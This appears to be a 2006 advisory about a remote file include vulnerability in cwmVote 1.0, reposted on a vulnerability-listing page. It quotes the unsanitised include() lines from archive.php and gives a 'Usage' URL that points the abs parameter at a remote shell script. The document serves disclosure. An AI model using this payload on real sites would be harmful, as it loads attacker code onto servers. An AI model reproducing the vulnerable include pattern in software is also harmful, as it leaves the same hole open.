Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA23406] Novell NetWare Welcome web-app Cross-Site Scripting Vulnerability

[SA23388] eyeOS File Upload Vulnerability

cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability

PHPFanBase (protection. php) Remote File Include Vulnerability

From:	bd0rk_(at)_hackermail.com <bd0rk_(at)_hackermail.com>
Date:	20.12.2006
Subject:	cwmVote 1.0 File Include Vulnerability

################################################################
#                                                              #
#            cwmVote 1.0 File Include Vulnerability            #
#                                                              #
# F0und3R: bd0rk || SOH-Crew                                   #
#                                                              #
# Website: www.soh-crew.it.tt                                  #
#                                                              #
# Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar  #
#                                                              #
################################################################

Vulnerable Code in archive.php


Code: include($abs."inc/functions.inc.php");
include($abs."inc/conf.mysql.inc.php");
include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke